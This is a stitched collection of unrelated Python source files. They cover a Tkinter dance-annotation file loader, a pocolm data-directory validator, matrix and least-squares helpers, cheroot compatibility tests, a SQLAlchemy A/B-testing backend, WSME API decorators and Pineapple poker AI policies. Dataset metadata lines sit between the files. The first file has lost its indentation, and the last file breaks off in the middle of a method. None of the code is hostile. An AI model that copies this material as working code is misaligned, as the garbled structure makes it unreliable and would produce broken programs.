self.bt_frames.grid(row=2, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_video.grid(row=2, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_video.grid(row=2, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
#self.separatorFramesVideo.pack(side="left", fill=Y, padx=5)
self.lbl_load_choreo.grid(row=3, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_choreo.grid(row=3, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.bt_load_ch.grid(row=3, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_choreo.grid(row=3, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_choreo.grid(row=3, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_load_mbeats.grid(row=4, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_mbeats.grid(row=4, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.bt_load_mbeats.grid(row=4, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_mbeats.grid(row=4, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_mbeats.grid(row=4, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.bt_exit.grid(row = 0, column = 3, sticky = (E), pady = 5, padx = 15, ipadx=25)
self.bt_continue.grid(row = 0, column = 4, sticky = (W), pady = 5, padx = 15, ipadx = 15)
ttk.Sizegrip().grid(row=6, column=3, sticky=(E))
#--------------------
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.fr_filedialog.columnconfigure(0, weight=1)
self.fr_filedialog.columnconfigure(1, weight=1)
self.fr_filedialog.columnconfigure(2, weight=1, minsize=30)
self.fr_filedialog.columnconfigure(3, weight=1)
self.fr_filedialog.columnconfigure(4, weight=1, minsize=100)
# for i in range(4):
# self.fr_filedialog.rowconfigure(i, weight=1)
self.root.resizable(True, True)
# If in debugging mode then load automatically the files
if self.debug_FLAG:
self.loadSkeletonData()
self.loadFramesByDirectory()
self.loadChoreography()
self.loadMusicBeats()
self.root.after(1000, self.StartAnno)
# Ignite GUI
self.root.mainloop()
return
# --- SKELETON DATA -------
def loadSkeletonData(self):
if self.debug_FLAG:
if self.db == 'salsa':
fname = 'Data\\Salsa\\performance-trajectories\\' + self.debug_fastaccess + '_kinect_1.mat'
elif self.db == 'calus':
fname = 'Data\\Calus\\rec.skel'
else:
if self.db == 'salsa':
fname = askopenfilename(initialdir='Data\\Salsa\\performance-trajectories',
filetypes=(("mat file", "*.mat"),("skel file", "*.skel"), ("All files", "*.*") ))
elif self.db == 'calus':
fname = askopenfilename(initialdir='Data\\Calus',
filetypes=(("skel file", "*.skel"), ("mat file", "*.mat"), ("All files", "*.*") )) #performance-trajectories
if fname:
try:
self.entry_name_mat.insert(0, "..." + fname[-30:])
dummy, fextension = os.path.splitext(fname)
# ------- load skeleton trajectories -----------------------
if fextension=='.mat':
self.signals_wrapper, self.Fs = readskel.readmatlab_wrapper(fname)
else: # .skel
self.signals_wrapper, self.Fs = readskel.skelparser(fname)
nJoints = len(self.signals_wrapper)
sigA = next(iter(self.signals_wrapper.values()))
nTrajects = len(sigA[0])
self.skeletonStatusSTR.set(str(nTrajects) + " trajects")
self.skeletonLoadedFlag = True
self.checkContinueEnable()
# global Fs, length_signal_samples
self.length_signal_samples = nTrajects
# put a separation line
separatorBtsA = ttk.Separator(self.fr_filedialog, orient=HORIZONTAL)
separatorBtsA.grid(row=5, column=0, columnspan=5, sticky="WE")
# show available joints
self.signalsSelected = {}
self.chb_joint = {}
i = 0
for key,v in sorted(self.signals_wrapper.items()):
self.signalsSelected[key] = IntVar()
if key in ('Left foot', 'Right foot'):
self.signalsSelected[key].set(1)
self.chb_joint[key] = ttk.Checkbutton(self.fr_filedialog, text = key, variable = self.signalsSelected[key], style="BW.TCheckbutton")
self.chb_joint[key].grid(row=6 + i % 10, column=1+i//10, columnspan=1, rowspan=1, sticky=(W))
i += 1
#make my screen dimensions work
w = 900 #The value of the width
h = 300 + 12*22 #The value of the height of the window
ws = self.root.winfo_screenwidth()#This value is the width of the screen
hs = self.root.winfo_screenheight()#This is the height of the screen
# calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))
#self.root.mainloop()
except Exception as e: # <- naked except is a bad idea
self.skeletonLoadedFlag = False
self.checkContinueEnable()
print(e)
showerror("Open Source File", "Failed to read file\n'%s'\n'%s'" % (fname, e))
return
return
#=========== Load directory of frames ======================================
def loadFramesByDirectory(self):
if self.debug_FLAG:
if self.db == 'salsa':
self.dname = "Data\\Salsa\\Videos\\" + self.debug_fastaccess + "_kinect_1"
elif self.db == 'calus':
self.dname = "Data\\Calus\\frames"
else:
if self.db == 'salsa':
self.dname = askdirectory(initialdir='Data\\Salsa\\Videos')
elif self.db == 'calus':
self.dname = askdirectory(initialdir='Data\\Calus')
if self.dname:
try:
self.entry_name_frames.insert(0,"..." + self.dname[-30:])
self.indexFrames = []
for file in os.listdir(self.dname):
dum, self.checkvideof_ext = os.path.splitext(file)
if self.checkvideof_ext in ('.jpeg', '.JPG', '.JPEG', '.png', '.bmp', '.PNG', '.BMP'):
dum, self.videof_ext = os.path.splitext(file)
k = file.rfind("_")
l = file.rfind(".")
iFrame = file[k+1:l]
if iFrame[0] == 'f':
iFrame = iFrame[1:]
self.indexFrames.append(int(iFrame))
self.prefixname = file[:k+2]
else:
self.indexFrames.append(int(iFrame))
self.prefixname = file[:k+1]
self.indexFrames = sorted(self.indexFrames)
self.videoStatusSTR.set( str(len(self.indexFrames)) + " Frames" )
self.videoLoadedFlag = True
elif file in ('Thumbs.db'):
continue
else:
showerror("Fail", "Only jpeg, jpg, JPG, bmp, BMP, png, PNG frames are supported")
self.videoLoadedFlag = False
return
self.checkContinueEnable()
except Exception as e: # <- naked except is a bad idea
self.videoLoadedFlag = False
self.checkContinueEnable()
showerror("Error", ("Open Source File\n'%s'" % e) + "\n" + ("Failed to open directory\n'%s'" % self.dname))
return
return
# =========== LOAD SVL CHOREOGRAPHY ===============================
def loadChoreography(self):
if self.debug_FLAG:
if self.db == 'salsa':
tempf =self.debug_fastaccess
tempf = list(tempf)
tempf[0] = tempf[0].upper()
tempf = ''.join(tempf)
fname = "Data\\Salsa\\SVL\\" + tempf + "_DanceAnnotationTool.svl"
elif self.db == 'calus':
fname = "Data\\Calus\\DanceAnnotationTool.txt"
else:
if self.db == 'salsa':
fname = askopenfilename(initialdir='Data\\Salsa\\SVL', filetypes=(("svl file", "*.svl"), ("txt file", "*.txt"), ("All files", "*.*") ))
elif self.db == 'calus':
fname = askopenfilename(initialdir='Data\\Calus', filetypes=(("txt file", "*.txt"), ("svl file", "*.svl"), ("All files", "*.*") ))
dummy, fextension = os.path.splitext(fname)
if fname:
try:
if fextension == '.svl':
params, self.annotationSecs, self.labels = readsvl.extractSvlAnnotRegionFile(fname)
self.entry_name_choreo.insert(0,"..." + fname[-30:])
self.choreoStatusSTR.set(str(len(self.labels)) + " labels")
self.choreoLoadedFlag = True
self.checkContinueEnable()
elif fextension == '.txt':
self.annotationSecs, self.labels, self.annotationSecsB, self.labelsB = readtxt.parse(fname)
self.entry_name_choreo.insert(0,"..." + fname[-30:])
self.choreoStatusSTR.set(str(len(self.labels)) + " labels")
self.choreoLoadedFlag = True
self.checkContinueEnable()
else:
showerror("Waring", "Parser does not exists for such a file, only svl or txt are supported")
except Exception as e:
self.choreoLoadedFlag = False
self.checkContinueEnable()
msg = "There was a problem in loading!\n'%s'" % e
if messagebox.askyesno("Error", msg + "\n" + "Do you want to choose another file?"):
self.loadChoreography()
else:
return
return
#=================== Music beats ========================================
def loadMusicBeats(self):
if self.debug_FLAG:
if self.db=='salsa':
fname = 'Data\\Salsa\\MusicBeats\\' + self.debug_fastaccess + '_feetcam-beats.txt'
else:
fname = None
else:
fname = askopenfilename(initialdir='Data\\Salsa\\MusicBeats',
filetypes=(("beats file", "*.txt"), ("All files", "*.*") )) #performance-trajectories
if fname:
try:
self.entry_name_mbeats.insert(0, "..." + fname[-30:])
dummy, fextension = os.path.splitext(fname)
# ------- load skeleton trajectories -----------------------
if fextension=='.txt':
self.beats = readtxt.parse_mbeats(fname)
else:
showerror("Error","Only txt file extension is supported")
return
self.nBeats = len(self.beats)
self.mbeatsStatusSTR.set(str(self.nBeats) + " Beats")
except Exception as e: # <- naked except is a bad idea
showerror("Open Source File", "Failed to read file\n'%s'\n'%s'" % (fname, e))
return
return
def close_window(self):
#if messagebox.askokcancel("Exit", "Are you sure?"):
self.root.destroy()
def StartAnno(self):
self.root.destroy()
DanceAnno_Application.Application.StartAnnotating(self)
def checkContinueEnable(self):
if self.skeletonLoadedFlag and self.videoLoadedFlag: # and self.choreoLoadedFlag:
self.bt_continue.config(state = NORMAL) | apache-2.0 | 6,038,724,737,106,642,000 | 43.656388 | 157 | 0.565432 | false |
wantee/pocolm | scripts/validate_int_dir.py | 2 | 5948 | #!/usr/bin/env python
# we're using python 3.x style print but want it to work in python 2.x,
from __future__ import print_function
import os
import argparse
import sys
import subprocess
parser = argparse.ArgumentParser(description="Validates directory containing integerized "
"text data, as produced by prepare_int_data.py",
epilog="E.g. validate_int_dir.py data/int.100k",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("int_dir",
help="Directory in which to find the data")
args = parser.parse_args()
os.environ['PATH'] = (os.environ['PATH'] + os.pathsep +
os.path.abspath(os.path.dirname(sys.argv[0])))
if not os.path.exists(args.int_dir):
sys.exit("validate_int_dir.py: Expected directory {0} to exist".format(args.int_dir))
if not os.path.exists("{0}/dev.txt.gz".format(args.int_dir)):
sys.exit("validate_int_dir.py: Expected file {0}/dev.txt.gz to exist".format(args.int_dir))
if not os.path.exists("{0}/num_train_sets".format(args.int_dir)):
sys.exit("validate_int_dir.py: Expected file {0}/num_train_sets to exist".format(args.int_dir))
# the following code checks num_train_sets and sets num_train_sets
# to the appropriate variable.
f = open("{0}/num_train_sets".format(args.int_dir))
line = f.readline()
try:
num_train_sets = int(line)
assert num_train_sets > 0 and len(line.split()) == 1
assert f.readline() == ''
except Exception as e:
sys.exit("validate_int_dir.py: Expected file {0}/num_train_sets to contain "
"an integer >0: {1}".format(args.int_dir, str(e)))
f.close()
# the following code checks num_words.
f = open("{0}/num_words".format(args.int_dir))
line = f.readline()
try:
num_words = int(line)
assert num_words > 0 and len(line.split()) == 1
assert f.readline() == ''
except Exception as e:
sys.exit("validate_int_dir.py: Expected file {0}/num_words to contain "
"an integer >0: {1}".format(args.int_dir, str(e)))
f.close()
# call validate_vocab.py to check the vocab.
if os.system("validate_vocab.py --num-words={0} {1}/words.txt".format(
num_words, args.int_dir)) != 0:
sys.exit(1)
num_words = subprocess.check_output("cat {0}/words.txt | wc -l".format(args.int_dir), shell=True)
try:
num_words = int(num_words) + 1
except:
sys.exit("validate_int_dir.py: error getting number of words from {0}/words.txt".format(
args.int_dir))
names = set()
# check the 'names' file; it should have lines like:
# 1 switchboard
# 2 fisher
# etc.
f = open("{0}/names".format(args.int_dir))
for n in range(1, num_train_sets + 1):
line = f.readline()
try:
[m, name] = line.split()
if name in names:
sys.exit("validate_int_dir.py: repeated name {0} in {1}/names".format(
name, args.int_dir))
names.add(name)
assert int(m) == n
except:
sys.exit("validate_int_dir.py: bad {0}'th line of {1}/names: '{2}'".format(
n, args.int_dir, line[0:-1]))
f.close()
# validate the 'unigram_weights' file, if it exists. the 'unigram_weights' file
# is an optional part of the directory format; we put it here so it can be used
# to initialize the metaparameters in a reasonable way.
if os.path.exists("{0}/unigram_weights".format(args.int_dir)):
f = open("{0}/unigram_weights".format(args.int_dir))
names_with_weights = set()
while True:
line = f.readline()
if line == '':
break
try:
[name, weight] = line.split()
weight = float(weight)
assert weight >= 0.0 and weight <= 1.0
if name not in names:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: "
"name {2} does not appear in {1}/names".format(
line[:-1], args.int_dir, name))
if name in names_with_weights:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: "
"name {2} appears twice".format(
line[:-1], args.int_dir, name))
names_with_weights.add(name)
except Exception as e:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: {2}".format(
line[:-1], args.int_dir, str(e)))
for name in names:
if name not in names_with_weights:
sys.exit("validate_int_dir.py: expected the name {0} to appear in "
"{1}/unigram_weights".format(name, args.int_dir))
f.close()
names = ['dev']
for n in range(1, num_train_sets + 1):
names.append(str(n))
for name in names:
p = subprocess.Popen("gunzip -c {0}/{1}.txt.gz 2>/dev/null".format(args.int_dir, name),
stdout=subprocess.PIPE, shell=True)
num_ints = 0
for l in range(10):
line = p.stdout.readline()
if line is None:
break
try:
ints = [int(x) for x in line.split()]
num_ints += len(ints)
for i in ints:
if i < 3 or i > num_words:
sys.exit("validate_int_dir.py: value {0} out of range in file {1}/{2}.txt.gz".format(
i, args.int_dir, name))
except:
sys.exit("validate_int_dir.py: bad line {0} in file {1}/{2}.txt.gz".format(
line.strip('\n'), args.int_dir, name))
if num_ints == 0:
# in theory it's possible that a file whose first 10 lines is empty
# could be valid, a there is nothing wrong in principle with modeling
# empty sequences. But it's very odd.
sys.exit("validate_int_dir.py: did not see any data in file {0}/{1}.txt.gz".format(
args.int_dir, name))
p.terminate()
| apache-2.0 | -8,972,085,041,014,795,000 | 38.390728 | 105 | 0.583053 | false |
haphaeu/yoshimi | GumbleBootstrap/matrix.py | 1 | 2495 | '''
matrix.py
Basic operations with matrixes:
- multiply
- transpose
- invert
And a simple linear least squares solver,
performing a linear fit between two vectors
yi = a+b.xi
Revision History
rev Date Description
0.1 2013.02.13 first issue, basic insanity check
Rafael Rossi
[email protected]
[email protected]
'''
#importing deepcopy to copy list and make sure the
#original lists are not altered
from copy import deepcopy
'''
matrix A with m rows and n columns
matrix B with o rows and p columns
AB = A.B with m rows and o columns
constraint: n==o
'''
def mmult(A,B):
n=len(A)
m=len(A[0])
p=len(B)
o=len(B[0])
if not n==o: return 0
AB=[[0.0 for i in range(m)] for j in range(p)]
for i in range(m):
for j in range(p):
AB[j][i]=0.0
for k in range(n):
AB[j][i]+=A[k][i]*B[j][k]
return AB
'''
returns the transpose of a matrix
matrix A with m rows and n columns
'''
def transpose(A):
n=len(A)
m=len(A[0])
B=[[0.0 for i in range(n)] for j in range(m)]
for i in range(m):
for j in range(n):
B[i][j]=A[j][i]
return B
'''
returns the inverse of a *square* matrix
'''
def minverse(Ao):
A=deepcopy(Ao)
m = len(A)
if not m==len(A[0]): return 0
#create zero matrix
AI=[[0.0 for i in range(m)] for j in range(m)]
#fill identity matrix
for i in range(m): AI[i][i]=1.0
#invert - Gaussian elimination
for k in range(m):
for i in range(k,m):
tmp = 1.0 * A[k][i]
for j in range(k,m):
A[j][i] /= tmp
for j in range(m):
AI[j][i] /= tmp
for i in range(k+1,m):
for j in range(k,m):
A[j][i]-= A[j][k]
for j in range(m):
AI[j][i] -= AI[j][k]
for i in range(m-2, -1, -1):
for j in range(m-1, i, -1):
for k in range(m):
AI[k][i] -= A[j][i] * AI[k][j]
for k in range(m):
A[k][i] -= A[j][i]*A[k][j]
return AI
'''
perform linear least squares fit between
2 vectors xo and yo.
returns coefficients a and b such that
yoi = a+b.xoi
constraints: both xo and yo need to be a row
vector xo=[n,n,n,n] with same size.
'''
def leastsquares(xo,yo):
n=len(xo)
if not n==len(yo): return 0
y=[deepcopy(yo)]
x=[[1]*n,deepcopy(xo)]
return mmult(mmult(minverse(mmult(transpose(x),x)),transpose(x)),y)[0]
| lgpl-3.0 | 1,635,034,303,182,393,000 | 22.317757 | 74 | 0.550701 | false |
cherrypy/cheroot | cheroot/test/test__compat.py | 1 | 1818 | # -*- coding: utf-8 -*-
"""Test suite for cross-python compatibility helpers."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
import six
from cheroot._compat import extract_bytes, memoryview, ntob, ntou, bton
@pytest.mark.parametrize(
('func', 'inp', 'out'),
(
(ntob, 'bar', b'bar'),
(ntou, 'bar', u'bar'),
(bton, b'bar', 'bar'),
),
)
def test_compat_functions_positive(func, inp, out):
"""Check that compatibility functions work with correct input."""
assert func(inp, encoding='utf-8') == out
@pytest.mark.parametrize(
'func',
(
ntob,
ntou,
),
)
def test_compat_functions_negative_nonnative(func):
"""Check that compatibility functions fail loudly for incorrect input."""
non_native_test_str = u'bar' if six.PY2 else b'bar'
with pytest.raises(TypeError):
func(non_native_test_str, encoding='utf-8')
def test_ntou_escape():
"""Check that ``ntou`` supports escape-encoding under Python 2."""
expected = u'hišřії'
actual = ntou('hi\u0161\u0159\u0456\u0457', encoding='escape')
assert actual == expected
@pytest.mark.parametrize(
('input_argument', 'expected_result'),
(
(b'qwerty', b'qwerty'),
(memoryview(b'asdfgh'), b'asdfgh'),
),
)
def test_extract_bytes(input_argument, expected_result):
"""Check that legitimate inputs produce bytes."""
assert extract_bytes(input_argument) == expected_result
def test_extract_bytes_invalid():
"""Ensure that invalid input causes exception to be raised."""
with pytest.raises(
ValueError,
match=r'^extract_bytes\(\) only accepts bytes '
'and memoryview/buffer$',
):
extract_bytes(u'some юнікод їїї')
| bsd-3-clause | 3,903,988,605,466,453,000 | 26.348485 | 77 | 0.632687 | false |
ryanpetrello/cleaver | cleaver/backend/db/__init__.py | 1 | 8256 | from datetime import datetime
from . import model
from .session import session_for
from cleaver.experiment import Experiment as CleaverExperiment
from cleaver.backend import CleaverBackend
def _sqlalchemy_installed():
try:
import sqlalchemy
except ImportError: # pragma: nocover
raise ImportError(
'The database backend requires SQLAlchemy to be installed. '
'See http://pypi.python.org/pypi/SQLAlchemy'
)
return sqlalchemy
_sqlalchemy_installed()
from sqlalchemy import and_ # noqa
class SQLAlchemyBackend(CleaverBackend):
"""
Provides an interface for persisting and retrieving A/B test results
to a SQLAlchemy-supported database.
"""
def __init__(self, dburi='sqlite://', engine_options={}):
self.dburi = dburi
self.engine_options = engine_options
self.Session = session_for(
dburi=self.dburi,
**self.engine_options
)
def experiment_factory(self, experiment):
if experiment is None:
return None
return CleaverExperiment(
backend=self,
name=experiment.name,
started_on=experiment.started_on,
variants=tuple(v.name for v in experiment.variants)
)
def all_experiments(self):
"""
Retrieve every available experiment.
Returns a list of ``cleaver.experiment.Experiment``s
"""
try:
return [
self.experiment_factory(e)
for e in model.Experiment.query.all()
]
finally:
self.Session.close()
def get_experiment(self, name, variants):
"""
Retrieve an experiment by its name and variants (assuming it exists).
:param name a unique string name for the experiment
:param variants a list of strings, each with a unique variant name
Returns a ``cleaver.experiment.Experiment`` or ``None``
"""
try:
return self.experiment_factory(model.Experiment.get_by(name=name))
finally:
self.Session.close()
def save_experiment(self, name, variants):
"""
Persist an experiment and its variants (unless they already exist).
:param name a unique string name for the experiment
:param variants a list of strings, each with a unique variant name
"""
try:
model.Experiment(
name=name,
started_on=datetime.utcnow(),
variants=[
model.Variant(name=v, order=i)
for i, v in enumerate(variants)
]
)
self.Session.commit()
finally:
self.Session.close()
def is_verified_human(self, identity):
try:
return model.VerifiedHuman.get_by(identity=identity) is not None
finally:
self.Session.close()
def mark_human(self, identity):
try:
if model.VerifiedHuman.get_by(identity=identity) is None:
model.VerifiedHuman(identity=identity)
self.Session.commit()
finally:
self.Session.close()
def get_variant(self, identity, experiment_name):
"""
Retrieve the variant for a specific user and experiment (if it exists).
:param identity a unique user identifier
:param experiment_name the string name of the experiment
Returns a ``String`` or `None`
"""
try:
match = model.Participant.query.join(
model.Experiment
).filter(and_(
model.Participant.identity == identity,
model.Experiment.name == experiment_name
)).first()
return match.variant.name if match else None
finally:
self.Session.close()
def set_variant(self, identity, experiment_name, variant_name):
"""
Set the variant for a specific user.
:param identity a unique user identifier
:param experiment_name the string name of the experiment
:param variant_name the string name of the variant
"""
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant and model.Participant.query.filter(and_(
model.Participant.identity == identity,
model.Participant.experiment_id == experiment.id,
model.Participant.variant_id == variant.id
)).count() == 0:
model.Participant(
identity=identity,
experiment=experiment,
variant=variant
)
self.Session.commit()
finally:
self.Session.close()
def _mark_event(self, type, experiment_name, variant_name):
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant and model.TrackedEvent.query.filter(and_(
model.TrackedEvent.type == type,
model.TrackedEvent.experiment_id == experiment.id,
model.TrackedEvent.variant_id == variant.id
)).first() is None:
model.TrackedEvent(
type=type,
experiment=experiment,
variant=variant
)
self.Session.commit()
finally:
self.Session.close()
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant:
self.Session.execute(
'UPDATE %s SET total = total + 1 '
'WHERE experiment_id = :experiment_id '
'AND variant_id = :variant_id '
'AND `type` = :type' % (
model.TrackedEvent.__tablename__
),
{
'experiment_id': experiment.id,
'variant_id': variant.id,
'type': type
}
)
self.Session.commit()
finally:
self.Session.close()
def mark_participant(self, experiment_name, variant):
"""
Mark a participation for a specific experiment variant.
:param experiment_name the string name of the experiment
:param variant the string name of the variant
"""
self._mark_event('PARTICIPANT', experiment_name, variant)
def mark_conversion(self, experiment_name, variant):
"""
Mark a conversion for a specific experiment variant.
:param experiment_name the string name of the experiment
:param variant the string name of the variant
"""
self._mark_event('CONVERSION', experiment_name, variant)
def _total_events(self, type, experiment_name, variant):
try:
row = model.TrackedEvent.query.join(
model.Experiment
).join(
model.Variant
).filter(and_(
model.TrackedEvent.type == type,
model.TrackedEvent.experiment_id == model.Experiment.id,
model.TrackedEvent.variant_id == model.Variant.id,
model.Experiment.name == experiment_name,
model.Variant.name == variant
)).first()
return row.total if row else 0
finally:
self.Session.close()
def participants(self, experiment_name, variant):
"""
The number of participants for a certain variant.
Returns an integer.
"""
return self._total_events('PARTICIPANT', experiment_name, variant)
def conversions(self, experiment_name, variant):
"""
The number of conversions for a certain variant.
Returns an integer.
"""
return self._total_events('CONVERSION', experiment_name, variant)
| bsd-3-clause | 4,451,674,343,953,962,000 | 32.975309 | 79 | 0.562379 | false |
stackforge/wsme | wsme/api.py | 1 | 7477 | import traceback
import functools
import inspect
import logging
import six
import wsme.exc
import wsme.types
from wsme import utils
log = logging.getLogger(__name__)
def iswsmefunction(f):
return hasattr(f, '_wsme_definition')
def wrapfunc(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
wrapper._wsme_original_func = f
return wrapper
def getargspec(f):
f = getattr(f, '_wsme_original_func', f)
return inspect.getargspec(f)
class FunctionArgument(object):
"""
An argument definition of an api entry
"""
def __init__(self, name, datatype, mandatory, default):
#: argument name
self.name = name
#: Data type
self.datatype = datatype
#: True if the argument is mandatory
self.mandatory = mandatory
#: Default value if argument is omitted
self.default = default
def resolve_type(self, registry):
self.datatype = registry.resolve_type(self.datatype)
class FunctionDefinition(object):
"""
An api entry definition
"""
def __init__(self, func):
#: Function name
self.name = func.__name__
#: Function documentation
self.doc = func.__doc__
#: Return type
self.return_type = None
#: The function arguments (list of :class:`FunctionArgument`)
self.arguments = []
#: If the body carry the datas of a single argument, its type
self.body_type = None
#: Status code
self.status_code = 200
#: True if extra arguments should be ignored, NOT inserted in
#: the kwargs of the function and not raise UnknownArgument
#: exceptions
self.ignore_extra_args = False
#: name of the function argument to pass the host request object.
#: Should be set by using the :class:`wsme.types.HostRequest` type
#: in the function @\ :function:`signature`
self.pass_request = False
#: Dictionnary of protocol-specific options.
self.extra_options = None
@staticmethod
def get(func):
"""
Returns the :class:`FunctionDefinition` of a method.
"""
if not hasattr(func, '_wsme_definition'):
fd = FunctionDefinition(func)
func._wsme_definition = fd
return func._wsme_definition
def get_arg(self, name):
"""
Returns a :class:`FunctionArgument` from its name
"""
for arg in self.arguments:
if arg.name == name:
return arg
return None
def resolve_types(self, registry):
self.return_type = registry.resolve_type(self.return_type)
self.body_type = registry.resolve_type(self.body_type)
for arg in self.arguments:
arg.resolve_type(registry)
def set_options(self, body=None, ignore_extra_args=False, status_code=200,
rest_content_types=('json', 'xml'), **extra_options):
self.body_type = body
self.status_code = status_code
self.ignore_extra_args = ignore_extra_args
self.rest_content_types = rest_content_types
self.extra_options = extra_options
def set_arg_types(self, argspec, arg_types):
args, varargs, keywords, defaults = argspec
if args[0] == 'self':
args = args[1:]
arg_types = list(arg_types)
if self.body_type is not None:
arg_types.append(self.body_type)
for i, argname in enumerate(args):
datatype = arg_types[i]
mandatory = defaults is None or i < (len(args) - len(defaults))
default = None
if not mandatory:
default = defaults[i - (len(args) - len(defaults))]
if datatype is wsme.types.HostRequest:
self.pass_request = argname
else:
self.arguments.append(FunctionArgument(argname, datatype,
mandatory, default))
class signature(object):
"""Decorator that specify the argument types of an exposed function.
:param return_type: Type of the value returned by the function
:param argN: Type of the Nth argument
:param body: If the function takes a final argument that is supposed to be
the request body by itself, its type.
:param status_code: HTTP return status code of the function.
:param ignore_extra_args: Allow extra/unknow arguments (default to False)
Most of the time this decorator is not supposed to be used directly,
unless you are not using WSME on top of another framework.
If an adapter is used, it will provide either a specialised version of this
decororator, either a new decorator named @wsexpose that takes the same
parameters (it will in addition expose the function, hence its name).
"""
def __init__(self, *types, **options):
self.return_type = types[0] if types else None
self.arg_types = []
if len(types) > 1:
self.arg_types.extend(types[1:])
if 'body' in options:
self.arg_types.append(options['body'])
self.wrap = options.pop('wrap', False)
self.options = options
def __call__(self, func):
argspec = getargspec(func)
if self.wrap:
func = wrapfunc(func)
fd = FunctionDefinition.get(func)
if fd.extra_options is not None:
raise ValueError("This function is already exposed")
fd.return_type = self.return_type
fd.set_options(**self.options)
if self.arg_types:
fd.set_arg_types(argspec, self.arg_types)
return func
sig = signature
class Response(object):
"""
Object to hold the "response" from a view function
"""
def __init__(self, obj, status_code=None, error=None,
return_type=wsme.types.Unset):
#: Store the result object from the view
self.obj = obj
#: Store an optional status_code
self.status_code = status_code
#: Return error details
#: Must be a dictionnary with the following keys: faultcode,
#: faultstring and an optional debuginfo
self.error = error
#: Return type
#: Type of the value returned by the function
#: If the return type is wsme.types.Unset it will be ignored
#: and the default return type will prevail.
self.return_type = return_type
def format_exception(excinfo, debug=False):
"""Extract informations that can be sent to the client."""
error = excinfo[1]
code = getattr(error, 'code', None)
if code and utils.is_valid_code(code) and utils.is_client_error(code):
faultstring = (error.faultstring if hasattr(error, 'faultstring')
else six.text_type(error))
r = dict(faultcode="Client",
faultstring=faultstring)
log.debug("Client-side error: %s" % r['faultstring'])
r['debuginfo'] = None
return r
else:
faultstring = six.text_type(error)
debuginfo = "\n".join(traceback.format_exception(*excinfo))
log.error('Server-side error: "%s". Detail: \n%s' % (
faultstring, debuginfo))
r = dict(faultcode="Server", faultstring=faultstring)
if debug:
r['debuginfo'] = debuginfo
else:
r['debuginfo'] = None
return r
| mit | 1,039,123,132,913,184,800 | 30.548523 | 79 | 0.604521 | false |
session-id/pineapple-ai | policies.py | 1 | 15317 | from collections import defaultdict
import math
import numpy as np
import random
import feature_extractors
import game as g
import hand_optimizer
class BasePolicy(object):
'''
Base class for all policies.
'''
def __init__(self, game, args=None):
self.game = game
# Must return the optimal action as determined by the policy for the given state
def get_action(self, state):
raise NotImplementedError
class HumanPolicy(BasePolicy):
'''
A policy that asks for human input for every move.
'''
def get_action(self, state):
while True:
self.game.print_state(state)
try:
# Action input format is Pos1 Pos2 ... PosN
# Example: 0 0 1 2 0
inp = raw_input("Card placements (space separated, x for discard): ").upper()
inp = inp.split(' ')
draw = sorted(state.draw)
action = tuple(sorted((draw[i], int(inp[i])) for i in range(len(inp)) if inp[i] != 'X'))
new_state = self.game.get_random_outcome(state, action) # Check if valid
return action
except Exception as e:
print 'Invalid action: {}'.format(e)
class RandomPolicy(BasePolicy):
'''
Policy that chooses an action uniformly randomly from all possible actions.
'''
def get_action(self, state):
actions = self.game.actions(state)
return random.sample(actions, 1)[0]
class BaselinePolicy(BasePolicy):
'''
Baseline policy as described in project proposal.
Starts off by placing cards at or below top_cutoff on top row, those
at or below mid_cutoff in mid row, and the rest in the bottom row.
Then, for every 3 card draw, takes the 2 largest cards and slots them according
to the same rule when possible, otherwise slotting them as low as possible.
'''
def __init__(self, game, args):
super(BaselinePolicy, self).__init__(game, args)
self.top_cutoff = 4
self.mid_cutoff = 9
def value_to_slot(self, value):
if value <= self.top_cutoff:
return 0
elif value <= self.mid_cutoff:
return 1
else:
return 2
def get_action(self, state):
remaining_capacities = self.game.get_remaining_capacities(state)
# Sort in decreasing order
draw = sorted(state.draw, lambda x, y: g.card_value(y) - g.card_value(x))
assert len(draw) == 5 or len(draw) == 3
# Always take highest 2 cards
if len(draw) == 3:
draw = draw[:-1]
values = [g.card_value(card) for card in draw]
action = []
for i in range(len(values)):
desired_row = self.value_to_slot(values[i])
slotted = False
# Search downwards first for spots
for j in range(desired_row, 3):
if remaining_capacities[j] > 0:
action += [(draw[i], j)]
remaining_capacities[j] -= 1
slotted = True
break
if not slotted:
# Then search upwards
for j in range(desired_row-1, -1, -1):
if remaining_capacities[j] > 0:
action += [(draw[i], j)]
remaining_capacities[j] -= 1
slotted = True
break
if not slotted:
self.game.print_state(state)
raise RuntimeError("Couldn't slot card anywhere!")
return tuple(action)
class NeverBustPolicy(BasePolicy):
'''
A policy that never plays a move that makes the current hierarchy of cards a bust. The policy
randomly samples from all viable moves.
'''
def get_action(self, state):
